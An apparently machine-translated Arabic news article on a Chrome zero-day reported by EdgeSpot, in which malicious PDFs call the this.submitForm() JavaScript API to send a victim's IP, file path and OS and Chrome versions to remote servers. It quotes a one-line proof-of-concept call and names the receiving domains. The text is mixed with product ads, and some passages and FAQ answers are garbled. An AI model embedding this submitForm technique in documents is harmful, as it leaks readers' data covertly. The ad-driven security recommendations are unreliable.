- اكتشفت EdgeSpot ثغرة أمنية مثيرة للاهتمام في يوم الصفر تستغل مستندات PDF في Chrome.
- هذا القابلية للتأثر يمكن أن يؤذيك عن طريق جمع البيانات الحساسة على جهاز الكمبيوتر الخاص بك.
- استكشف صفحة الويب والسحابة لمزيد من الأفكار حول الأدوات والخدمات الأخرى.
- إذا كنت مهتمًا بالمتصفحات ، فنحن نقدم الكثير من المعلومات عنها في موقعنا مركز المتصفحات.
اجعل جميع مستنداتك سهلة الوصول وآمنة باستخدام Adobe Acrobat Reader. ستتيح لك أداة إدارة المستندات هذه أيضًا التوقيع الإلكتروني وإنشاء نماذج رسمية لتوفير وقتك في العمل. احصل عليه لجهاز الكمبيوتر الخاص بك وستتمكن من:
- افتح وطبع وحرر جميع أنواع ملفات PDF وأنواع الملفات الأخرى
- تعبئة نماذج PDF أسهل
- احتفظ بمستنداتك الأساسية مشفرة
احصل على جميع التطبيقات بسعر خاص!
برنامج إدارة المستندات Nr.1 في العالم الآن بسعر رائع ، لذا أسرع!
اكتشفت خدمة الكشف عن الاستغلال EdgeSpot أمرًا مثيرًا للاهتمام كروم ثغرة يوم الصفر تستغل مستندات PDF.
الثغرة الأمنية تسمح للمهاجمين حصاد البيانات الحساسة باستخدام مستندات PDF ضارة مفتوحة في Chrome.
بمجرد أن تفتح الضحية ملفات PDF ذات الصلة في Google Chrome ، يبدأ برنامج ضار في العمل في الخلفية من خلال جمع بيانات المستخدم.
ثم يتم إعادة توجيه البيانات إلى الخادم البعيد الذي يتحكم فيه المتسللون. قد تتساءل عن البيانات التي يمتصها المهاجمون ، فهم يستهدفون البيانات التالية على جهاز الكمبيوتر الخاص بك:
- عنوان IP
- المسار الكامل لملف PDF على النظام
- إصدارات OS و Chrome
احذر من ملفات PDF المليئة بالبرامج الضارة
خبراء مراقب هذا واحد من المجالين readnotify [.] com أو المتعاون [.] صافي كان يتلقى البيانات.
وكشفوا أن المهاجمين يستخدمون this.submitForm () واجهة برمجة تطبيقات PDF Javascript لجمع المعلومات الحساسة للمستخدمين.
اختبرناها مع الحد الأدنى من PoC ، مثل استدعاء API بسيط this.submitForm (‘ http://google.com/test’) سيجعل Google Chrome يرسل البيانات الشخصية إلى google.com.
تم استغلال خطأ Chrome هذا بواسطة مجموعتين متميزتين من ملفات PDF الضارة ، وكلاهما تم تداولهما في أكتوبر 2017 وسبتمبر 2018 ، على التوالي.
والجدير بالذكر أن البيانات التي تم جمعها يمكن أن يستخدمها المهاجمون لضبط الهجمات في المستقبل. تشير التقارير إلى أنه تم تجميع الدفعة الأولى من الملفات باستخدام خدمة تتبع ملفات PDF في ReadNotify.
يمكن للمستخدمين الاستفادة من الخدمة لتتبع وجهات نظر المستخدم. لم تشارك EdgeSpot أي تفاصيل تتعلق بطبيعة المجموعة الثانية من ملفات PDF.
نصيحة سريعة: قم بتغيير متصفحك إلى Opera
في هذه الأوقات العصيبة ، نتعرض للهجوم بالبرامج الضارة والتصيد الاحتيالي وأحصنة طروادة في كل خطوة ، لذلك يتعين علينا أن نكون أكثر يقظة ونبقى محميًا.
ونظرًا لأن هذه مشكلة خاصة بـ Chrome ، يمكنك تجنب هذا التهديد وكل الآخرين باستخدام متصفح موجه للأمان مثل أوبرا.
يأتي هذا المتصفح مع مانع إعلانات مدمج لا يزيل فقط مثل هذه الانحرافات ولكن أيضًا يمنع التحليلات النصية ، وتتبع البكسل ، وطرق جمع البيانات الخاصة بك.
وإذا كنت تريد أن تكون متأكدًا تمامًا من أنك تبتعد عن أي خطر ، فاحرص على البقاء خلف الجهاز المدمج VPN خدمة مجانية 100٪ للاستخدام لفترة غير محدودة.
أوبرا
يوفر Opera الحماية المثالية من التهديدات مع أداة حظر الإعلانات المضمنة وخدمة VPN مجانًا!
زيارة الموقع
كيف يمكنني البقاء محميًا من ثغرات PDF؟
قم بتنزيل Adobe Acrobat PRO
يتطابق Adobe و Chrome بشكل جيد عندما يتعلق الأمر بمعالجة ملفات PDF. من خلال تثبيت Adobe Extension for Chrome ، يمكنك مراجعة ملفات PDF ومعالجتها حسب رغبتك دون مغادرة متصفحك المفضل.
على الرغم من هيكلها القوي ، فقد لا يتم اكتشاف البرامج الضارة المخفية في ملفات PDF إذا كنت تستخدم الإصدار القياسي من القارئ.
يوصى باستخدام الإصدار الاحترافي لضمان حمايتك والحفاظ على بياناتك بعيدًا عن المتسللين.
على الرغم من أنه ليس مجانيًا ، إلا أن السعر الذي ستدفعه صغير نوعًا ما مقابل مجموعة كبيرة من الميزات الإضافية التي ستستمتع بها بما في ذلك الأمان المعزز لملفات PDF الخاصة بك.
هناك أيضًا نسخة تجريبية مجانية مدتها 7 أيام متضمنة حتى تتمكن من تذوق تجربة Pro الكاملة قبل إجراء عملية الشراء.
برنامج Adobe Acrobat PRO
ابتعد عن البرامج الضارة عن طريق تنزيل Adobe Acrobat PRO. يحتوي على الكثير من الميزات أكثر من الإصدار المجاني ويحافظ على أمان بياناتك.
زيارة الموقع
إذا كنت تريد أن تكون آمنًا أثناء تصفح الإنترنت ، فستحتاج إلى الحصول على أداة مخصصة بالكامل لتأمين شبكتك. قم بتثبيت Private Internet Access الآن وتأمين نفسك. إنه يحمي جهاز الكمبيوتر الخاص بك من الهجمات أثناء التصفح ، ويخفي عنوان IP الخاص بك ، ويمنع كل الوصول غير المرغوب فيه.
أرادت خدمة الكشف عن Exploit EdgeSpot تنبيه مستخدمي Chrome بشأن المخاطر المحتملة لأنه لم يكن من المتوقع إصدار التصحيح في المستقبل القريب.
أبلغت EdgeSpot Google عن الثغرة الأمنية العام الماضي ووعدت الشركة بإصدار تصحيح في أواخر أبريل.
ومع ذلك ، يمكنك التفكير في استخدام حل مؤقت للمشكلة من خلال عرض مستندات PDF المستلمة محليًا باستخدام تطبيق قارئ آخر.
بدلاً من ذلك ، يمكنك أيضًا فتح مستندات PDF الخاصة بك في Chrome عن طريق فصل أنظمتك عن الإنترنت.
أسئلة مكررة
نعم إنها كذلك. ولكن إذا كنت تريد اختيارًا أوسع ، استكشف أفضل اختياراتنا لـ كرومالإجمالية ملحقات في هذا الدليل الكامل.
تيهنا الكثير من الامتدادات التي تسمح ملفات PDF يتم المعالجة. الشيك خارج منطقتنا دليل ممتاز حول أفضل ملحقات PDF لمتصفح Chrome.
إنه لا يعمل ولكن يمكنك تنشيطه بسرعة. هنا لدينا دليل شامل حول كيفية تمكين منشئ رمز الاستجابة السريعة في Chrome.